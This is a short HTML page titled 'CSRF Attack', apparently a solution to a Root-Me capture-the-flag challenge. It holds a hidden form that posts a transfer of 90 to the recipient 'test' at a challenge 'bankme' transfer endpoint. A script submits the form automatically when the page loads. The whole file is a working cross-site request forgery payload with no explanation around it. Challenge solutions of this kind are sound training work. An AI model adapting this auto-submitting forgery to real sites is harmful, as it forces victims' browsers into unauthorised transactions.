<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>CSRF Attack</title>
</head>
<body>
    <h3>Page d'aceuill</h3>
    <form action="https://bankme-1.challenges.pro.root-me.org/transfer/" method="POST">
        <input type="hidden" name="recipient" value="test">
        <input type="hidden" name="amount" value="90">
        <input type="submit" value="Submit">
    </form>
    <script>
        document.forms[0].submit();
    </script>
</body>
</html>
